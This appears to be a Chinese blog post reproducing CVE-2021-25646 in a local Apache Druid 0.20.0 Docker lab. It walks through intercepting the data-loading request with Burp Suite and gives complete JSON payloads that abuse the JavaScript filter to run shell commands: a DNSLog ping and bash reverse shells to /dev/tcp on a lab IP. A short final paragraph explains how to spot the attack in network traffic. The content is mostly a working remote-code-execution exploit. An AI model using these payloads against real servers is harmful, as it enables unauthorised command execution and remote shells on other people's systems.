CVE-2021-25646 (Apache Druid 8888)漏洞复现

环境复现:docker 直接拉取 Apache Druid 0.20.0

实验步骤:

1、进入首页(localhost进入无法正常进行)

2、Load data → Local disk

3、Base directory >> quickstart/tutorial

4、File filter >> wikiticker-2015-09-12-sampled.json.gz

5、Preview

6、Next: Parse data(挂代理,burpsuite)

7、修改数据包,填入payload

 

 1 DNS查询payload
 2 
 3 ```php
 4 {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
 5 "function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 ping 7wsyab.dnslog.cn')}",
 6 "dimension":"added",
 7 "":{
 8 "enabled":"true"
 9 }
10 }}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}
11 ```

 

1 {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
2 "function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/ip/port 0>&1')}",
3 "dimension":"added",
4 "":{
5 "enabled":"true"
6 }
7 }}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}

 

以下语句是执行命令的代码

"function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.200.128/7777 0>&1')}"

 

docker运行时,要docker命令跑数据的时候就开始实验,中途如果退出docker再启动的话,可能会造成druid无法接手导数据,导致payload一直失败。

 网络层面抓包判断是否为攻击的话,主要依靠多出来的部分和执行命令的代码,正常的请求是不会调用java.lang.Runtime.getRuntime()这个函数的,也不会有多出来的这部分代码,其中执行命令的代码是判断此次攻击何种目的的关键。

1 ":[],"filter":{"type":"javascript",
2 "function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.200.128/4444 0>&1')}",
3 "dimension":"added",
4 "":{
5 "enabled":"true"
6 }
7 }}}},"

 

posted @ 2021-02-08 14:59  日月的阿金  阅读(218)  评论(0编辑  收藏  举报